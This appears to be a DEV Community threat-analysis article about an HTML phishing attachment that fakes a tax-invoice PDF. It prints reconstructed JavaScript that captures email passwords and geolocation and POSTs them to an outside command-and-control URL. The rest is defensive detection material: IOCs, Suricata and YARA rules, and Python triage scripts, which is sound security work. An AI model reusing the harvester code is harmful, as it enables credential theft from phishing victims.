Technology May 01, 2026 · 8 min read

Anatomy of a Low-Detection Credential Phishing Campaign

DEV Community
by KL3FT3Z
description: "Deep-dive reverse engineering analysis of a sophisticated HTML-based credential harvester spoofing a corporate domain with only 1/26 AV detection."

⚠️ Threat Level: HIGH | Detection Rate: 3% (1/26) | Type: Credential Harvester + Geo-IP Exfiltration

Executive Summary

On April 29, 2026, a targeted phishing email was received purportedly from accnt@hackteam.red — a lookalike domain spoofing a legitimate corporate identity. The attachment, named Tax Invoice PDF.SHTML, is a highly obfuscated HTML file masquerading as a PDF document. When opened in a browser, it harvests email credentials and geolocation data, exfiltrating them to a command-and-control (C2) server with minimal antivirus detection.

This article provides a full technical teardown of the sample, its behavioral indicators, network infrastructure, and defensive recommendations.

1. Attack Chain Overview

[Email Delivery] → [Social Engineering] → [HTML Execution] → [Credential Harvesting] → [Geo-IP Collection] → [C2 Exfiltration] → [Delayed Redirect]
Stage           Description
--------------  ------------------------------------------------------------------
Delivery        Spearphishing email with .SHTML attachment
Pretext         "Tax invoice due for payment" — urgency-based social engineering
Execution       User opens file → browser renders fake login page
Harvesting      Form captures email + password
Reconnaissance  ip-api.com lookup for geolocation enrichment
Exfiltration    POST to premiumpriests4owo.site/report.php
Evasion         Redirect to Google static image to mask compromise

2. Sample Metadata

Filename:        Tax Invoice PDF.SHTML
Size:            18 KiB
MIME Type:       text/html
SHA256:          15383c1b855341a0bc4975f2f3ed299bc6abf13a3e6e48b05ca3371dd7068dfc
AV Detection:    1/26 (3%) — Avira: PHISH/HTML.Agent.ENJ
Entropy:         5.42 (high — indicates script obfuscation)
First Seen:      2026-05-01 07:57:37 UTC

Why the Low Detection Rate?

Traditional AV engines excel at signature-based detection of binary malware (PE files, DLLs). This sample is pure HTML + JavaScript — a "fileless" threat that executes entirely within the browser sandbox. Without a malicious binary payload, most static scanners return clean results. The high entropy (5.42) confirms obfuscated JavaScript, but entropy alone is rarely sufficient for detection without behavioral analysis.

3. Email Analysis

Headers & Social Engineering

Key Psychological Triggers:

  • Domain spoofing: hackteam.red mimics a legitimate corporate domain
  • Authority impersonation: Sender name "Account" implies financial department
  • Urgency: "due for payment at the end of this month"
  • Curiosity gap: "Use your email password to access the Tax document" — this is the critical red flag; no legitimate PDF requires an email password

4. Behavioral Analysis (Sandbox Telemetry)

Analysis performed via Hybrid Analysis Falcon Sandbox. The sample triggered 29 indicators mapped to 21 MITRE ATT&CK techniques across 8 tactics.

4.1 Process Execution

# Primary execution
msedge.exe -- "file:///C:/TaxInvoicePDF.SHTML.html"

# Child processes spawned (standard Edge browser behavior)
msedge.exe --type=renderer
msedge.exe --type=gpu-process
msedge.exe --type=utility --utility-sub-type=network.mojom.NetworkService
identity_helper.exe --type=utility

Note: The file opens directly in the browser via the file:// protocol, so no external server is required to render the lure; only the later exfiltration needs outbound HTTP. This makes the sample highly portable and dangerous even in air-gapped preview scenarios: the fake login page renders offline, and the captured credentials leave the host as soon as network access is available.

4.2 Network Indicators

Domain / IP                  Purpose                                          Risk
---------------------------  -----------------------------------------------  ------------------
ip-api.com                   Geo-IP lookup (country, region, city, ISP, IP)   Reconnaissance
premiumpriests4owo.site      C2 server — credential exfiltration              MALICIOUS
i.imgur.com/6lOn9d7.png      Likely decoy image / branding asset              Legitimate, abused
encrypted-tbn0.gstatic.com   Post-exfiltration redirect destination           Legitimate, abused

4.3 MITRE ATT&CK Mapping

Technique                     ID         Context
----------------------------  ---------  -----------------------------------------
Spearphishing Attachment      T1566.001  Email with .SHTML attachment
Drive-by Compromise           T1189      Browser execution of malicious HTML
System Location Discovery     T1016      ip-api.com JSON query
Exfiltration Over C2          T1041      POST to report.php
Obfuscated Files              T1027.006  High entropy JS (5.42)
Input Capture                 T1056.004  Password field harvesting
Application Layer Protocol    T1071.001  HTTP/HTTPS C2 communication
Data Encoding                 T1132.001  Base64 artifacts in requests

5. Reverse Engineering: Script Deconstruction

Based on sandbox memory extraction and pattern matching, the embedded JavaScript follows this logical flow:

// ============================================
// Phase 1: Geolocation Reconnaissance
// ============================================
let locationData = {}; // filled asynchronously; stays empty if the lookup fails or is blocked
fetch('http://ip-api.com/json/?fields=status,message,country,regionName,city,isp,query')
  .then(response => response.json())
  .then(geoData => {
    if (geoData.status === 'success') {
      locationData = {
        country: geoData.country || 'Unknown',
        state: geoData.regionName || 'Unknown',
        city: geoData.city || 'Unknown',
        isp: geoData.isp || 'Unknown',
        ip: geoData.query || 'Unknown'
      };
    }
  });

// ============================================
// Phase 2: Credential Harvesting Form
// ============================================
/*
  Rendered HTML structure (inferred):
  <form method="post" id="authForm">
    <input type="email" placeholder="email" name="oruko">
    <input type="password" placeholder="Enter password" name="...">
    <button type="submit">Access Document</button>
  </form>
  <div id="errorMsg">Invalid credentials</div>
*/

document.getElementById('authForm').addEventListener('submit', function(e) {
  e.preventDefault(); // Prevent actual form submission

  const formEmail = document.querySelector('[name="oruko"]').value;
  const formPassword = document.querySelector('[type="password"]').value;

  // ============================================
  // Phase 3: Data Exfiltration
  // ============================================
  const xhr = new XMLHttpRequest();
  const PHP_ENDPOINT = 'https://premiumpriests4owo.site/report.php';

  xhr.open('POST', PHP_ENDPOINT, true);
  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

  const params = new URLSearchParams();
  params.append('oruko', formEmail);      // "oruko" = Yoruba for "name"
  params.append('...', formPassword);    // [obfuscated key]
  params.append('geo', JSON.stringify(locationData));

  xhr.send(params.toString());

  // ============================================
  // Phase 4: Evasion — Delayed Redirect
  // ============================================
  setTimeout(() => {
    window.location.href = 'https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQaUwWuDNV0h2gvKH5z1fKZ2B05YVGNhfKgCg&s';
  }, 2000); // 2-second delay to mask data transmission
});

Notable Obfuscation Techniques

  1. High Entropy Strings: Character sequences like y."sZ"( and J+zX suggest Base64 or custom encoding layers
  2. Legitimate Service Abuse: Using ip-api.com (free geo-IP API) and i.imgur.com (image hosting) blends malicious traffic with benign patterns
  3. Variable Naming: The use of oruko (Yoruba language) may indicate operator origin or intentional anti-analysis confusion
  4. Delayed Redirect: The setTimeout redirect to a Google static image creates a plausible "loading" experience while data transmits in background

6. Infrastructure Analysis

C2 Domain: premiumpriests4owo.site

  • TLD: .site — commonly abused for cheap, disposable infrastructure
  • Naming convention: Nonsensical dictionary words + random suffix (4owo) — algorithmically generated domain (DGA-like pattern)
  • Endpoint: /report.php — standard PHP data collection script
  • Protocol: HTTPS (TLS 1.2) — encrypts exfiltration in transit

Abuse of Legitimate Services

Service          Abuse Vector                                               Detection Evasion
---------------  ---------------------------------------------------------  --------------------------------------
ip-api.com       Free geolocation API                                       No malicious infrastructure needed
i.imgur.com      Image hosting for decoy assets                             Trusted domain in corporate allowlists
googleapis.com   Chrome Web Store verification (legitimate Edge behavior)   Blends with normal browser traffic

7. Detection & Defensive Strategies

7.1 Network-Level Detection

# Suricata signatures. The geo-IP lookup and the credential POST are separate
# HTTP transactions to different hosts, so one signature cannot match both;
# each gets its own rule and the two alerts are correlated by client IP in the
# SIEM. (Snort 2 has no http_host modifier; use http_header there instead.)
alert http any any -> any any (
    msg:"PHISHING Geo-IP enrichment lookup matching HTML credential harvester";
    flow:established,to_server;
    content:"ip-api.com"; http_host;
    content:"/json/"; http_uri;
    content:"fields=status,message,country,regionName,city,isp,query"; http_uri;
    classtype:trojan-activity;
    sid:1000001; rev:2;
)

alert http any any -> any any (
    msg:"SUSPICIOUS POST of credential form fields to .site domain";
    flow:established,to_server;
    content:"POST"; http_method;
    content:".site"; http_host;
    content:"application/x-www-form-urlencoded"; http_header;
    pcre:"/(^|&)(password|passwd|pwd|email|oruko)=/Pi";
    classtype:trojan-activity;
    sid:1000002; rev:2;
)
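The geo-IP lookup and the credential POST are separate HTTP transactions to different hosts, so the correlation between them has to happen outside the signature engine. The script below is an added example, not code from the original article: it replays constructed eve.json-style events (field names src_ip, hostname, http_method and request_body are assumptions, and "pwd" stands in for the sample's obfuscated password key) and reports each client whose geo-IP lookup is followed within a short window by a credential-bearing POST to another host.

```python
import json
import re
from datetime import datetime

# Constructed HTTP events in an eve.json-like shape (not real telemetry);
# "pwd" stands in for the sample's obfuscated password field name.
SAMPLE_EVENTS = [
    '{"timestamp":"2026-05-01T07:58:01Z","src_ip":"10.0.0.5","http":{"hostname":"ip-api.com",'
    '"http_method":"GET","url":"/json/?fields=status,message,country,regionName,city,isp,query"}}',
    '{"timestamp":"2026-05-01T07:58:03Z","src_ip":"10.0.0.5","http":{"hostname":"i.imgur.com",'
    '"http_method":"GET","url":"/6lOn9d7.png"}}',
    '{"timestamp":"2026-05-01T07:58:19Z","src_ip":"10.0.0.5","http":{"hostname":"premiumpriests4owo.site",'
    '"http_method":"POST","url":"/report.php","request_body":"oruko=alice%40corp.example&pwd=hunter2&geo=%7B%7D"}}',
    '{"timestamp":"2026-05-01T08:10:00Z","src_ip":"10.0.0.9","http":{"hostname":"intranet.corp.example",'
    '"http_method":"POST","url":"/login","request_body":"email=bob%40corp.example&password=x"}}',
]

GEO_HOSTS = {"ip-api.com", "ipapi.co"}
# Credential-looking form field names, as in the Suricata pcre above.
CRED_KEYS = re.compile(r"(^|&)(password|passwd|pwd|email|oruko)=", re.I)

def parse_events(lines):
    """Parse JSON lines and sort by timestamp so the sequence check is order-safe."""
    events = []
    for line in lines:
        e = json.loads(line)
        e["ts"] = datetime.strptime(e["timestamp"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(e)
    return sorted(events, key=lambda e: e["ts"])

def find_harvester_sequences(lines, window_seconds=60):
    """Return (src_ip, geo_host, exfil_host) for each client whose geo-IP lookup is
    followed within window_seconds by a credential-bearing POST to a different host."""
    hits, last_geo = [], {}          # last_geo: src_ip -> (timestamp, geo host)
    for e in parse_events(lines):
        h = e["http"]
        host = h.get("hostname", "").lower()
        if h.get("http_method") == "GET" and host in GEO_HOSTS:
            last_geo[e["src_ip"]] = (e["ts"], host)
            continue
        if h.get("http_method") != "POST" or e["src_ip"] not in last_geo:
            continue
        geo_ts, geo_host = last_geo[e["src_ip"]]
        if (e["ts"] - geo_ts).total_seconds() <= window_seconds and host != geo_host \
                and CRED_KEYS.search(h.get("request_body", "")):
            hits.append((e["src_ip"], geo_host, host))
    return hits

if __name__ == "__main__":
    for src, geo, c2 in find_harvester_sequences(SAMPLE_EVENTS):
        print(f"{src}: geo lookup via {geo} then credential POST to {c2}")
```

The 10.0.0.9 login POST is not reported because no geo-IP lookup preceded it, which is what keeps ordinary intranet logins out of the alert.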

7.2 Email Security Policies

Policy                      Implementation
--------------------------  ------------------------------------------------------------------
Attachment Blocking         Quarantine .shtml, .html, .htm attachments from external senders
Double Extension Detection  Flag *.PDF.* patterns — PDFs don't need secondary extensions
DMARC Enforcement           p=reject for hackteam.red to prevent spoofing
User Training               "No PDF requires your email password" — golden rule

7.3 Endpoint Detection (EDR/XDR)

# Behavioral Indicator (the command line carries only the local file path; the
# geo-IP hostname appears in the same process's network telemetry, so join on PID)
Process: msedge.exe | chrome.exe | firefox.exe
CommandLine contains: "file:///" AND (".html" OR ".htm" OR ".shtml")
Followed within 60s by DNS query / network connection from that process to: "ip-api.com" OR "ipapi.co"
Action: Alert + Isolate

# File System Indicator
FileWrite: *.SHTML OR *.HTML
  where entropy > 5.0 AND (content contains "password" OR content contains "type=\"password\"")
Action: Quarantine + Hash submission

7.4 YARA Rule

rule HTML_Credential_Harvester_Generic {
    meta:
        description = "Detects HTML-based credential phishing with geo-IP and exfiltration"
        author = "ThreatIntel Analyst"
        date = "2026-05-01"
        hash = "15383c1b855341a0bc4975f2f3ed299bc6abf13a3e6e48b05ca3371dd7068dfc"
    strings:
        $geo1 = "ip-api.com" ascii wide
        $geo2 = "ipapi.co" ascii wide
        $form1 = "type=\"password\"" ascii wide
        $form2 = "placeholder=\"Enter password\"" ascii wide
        $exfil1 = "XMLHttpRequest" ascii wide
        $exfil2 = "URLSearchParams" ascii wide
        $exfil3 = "application/x-www-form-urlencoded" ascii wide
        $redirect1 = "setTimeout" ascii wide
        $redirect2 = "window.location.href" ascii wide
    condition:
        filesize < 50KB and
        // uint16() is little-endian, so "<!" reads as 0x213c and "<h" as 0x683c
        (uint16(0) == 0x213c or uint16(0) == 0x683c) and
        1 of ($geo*) and
        1 of ($form*) and
        1 of ($exfil*) and
        1 of ($redirect*)
}
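For triage outside a YARA engine, the following added example (not code from the original article) applies the rule's four string families, the entropy threshold from 7.3, the document-name-before-HTML-extension check from 7.2, and the little-endian reading of the leading bytes in one Python script. SAMPLE_HTML is a constructed stand-in for the lure page, not the real sample's contents, and example.invalid is a placeholder host.

```python
import math
import re
import struct
from collections import Counter

# Constructed stand-in for the lure page; not the real sample's contents.
SAMPLE_HTML = b"""<!DOCTYPE html><html><body><form method="post" id="authForm">
<input type="email" name="oruko"><input type="password" placeholder="Enter password">
</form><script>
fetch('http://ip-api.com/json/?fields=status,country,query').then(r => r.json());
const xhr = new XMLHttpRequest(); xhr.open('POST', 'https://example.invalid/report.php');
setTimeout(() => { window.location.href = 'https://encrypted-tbn0.gstatic.com/images'; }, 2000);
</script></body></html>"""

# Same four string families as the YARA rule above.
INDICATORS = {
    "geo": [b"ip-api.com", b"ipapi.co"],
    "form": [b'type="password"', b'placeholder="Enter password"'],
    "exfil": [b"XMLHttpRequest", b"URLSearchParams", b"application/x-www-form-urlencoded"],
    "redirect": [b"setTimeout", b"window.location.href"],
}
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx"}
HTML_EXTS = {"html", "htm", "shtml"}

def shannon_entropy(data):
    """Bits per byte; the sample's 5.42 sits above the article's 5.0 threshold."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def html_magic(data):
    """First two bytes are '<!' or '<h'. YARA's uint16(0) is little-endian, so these
    compare as 0x213c and 0x683c, not 0x3c21 / 0x3c68."""
    return len(data) >= 2 and struct.unpack("<H", data[:2])[0] in (0x213C, 0x683C)

def indicator_families(data):
    return {fam for fam, pats in INDICATORS.items() if any(p in data for p in pats)}

def disguised_extension(filename):
    """HTML extension behind a name that ends in a document type word,
    e.g. 'Tax Invoice PDF.SHTML' or 'invoice.pdf.html'."""
    stem, _, ext = filename.lower().rpartition(".")
    last_word = re.split(r"[ ._-]+", stem)[-1] if stem else ""
    return ext in HTML_EXTS and last_word in DOC_EXTS

def triage(filename, data):
    fams = indicator_families(data)
    return {"entropy": round(shannon_entropy(data), 2), "html_magic": html_magic(data),
            "families": sorted(fams), "disguised_name": disguised_extension(filename),
            "suspicious": html_magic(data) and len(fams) == 4 and len(data) < 50 * 1024}
```

Run triage("Tax Invoice PDF.SHTML", SAMPLE_HTML) to see all four families, the disguised name and the suspicious verdict set; a file that merely contains a password field without the geo-IP or redirect strings stays below the bar.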

8. IOC Summary

Type             Indicator                                                                                        Confidence
---------------  -----------------------------------------------------------------------------------------------  ----------
File Hash        15383c1b855341a0bc4975f2f3ed299bc6abf13a3e6e48b05ca3371dd7068dfc                                 Confirmed
C2 Domain        premiumpriests4owo.site                                                                          Malicious
C2 URL           https://premiumpriests4owo.site/report.php                                                       Malicious
Geo-IP API       http://ip-api.com/json/                                                                          Abused
Decoy Image      https://i.imgur.com/6lOn9d7.png                                                                  Abused
Redirect Target  https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQaUwWuDNV0h2gvKH5z1fKZ2B05YVGNhfKgCg&s   Abused
Sender           accnt@hackteam.red                                                                               Spoofed

9. Lessons Learned

  1. Fileless threats bypass traditional AV: HTML/JS phishing requires behavioral analysis, not just signatures
  2. Legitimate services are weaponized: ip-api.com, imgur.com, googleapis.com provide cover for malicious activity
  3. Double extensions still work: PDF.SHTML exploits user trust in PDFs while executing HTML
  4. Low detection ≠ low risk: 1/26 AV detection is a feature, not a bug — the threat is real and active
  5. User awareness is the last line of defense: Technical controls failed; the user who questions "Why does a PDF need my password?" stops the chain

10. References

Analysis conducted May 1, 2026. Indicators are shared for defensive purposes. If you encounter similar samples, submit to your threat intelligence platform and update detection rules.

Stay vigilant. Trust but verify.

This article was originally published by DEV Community and written by KL3FT3Z.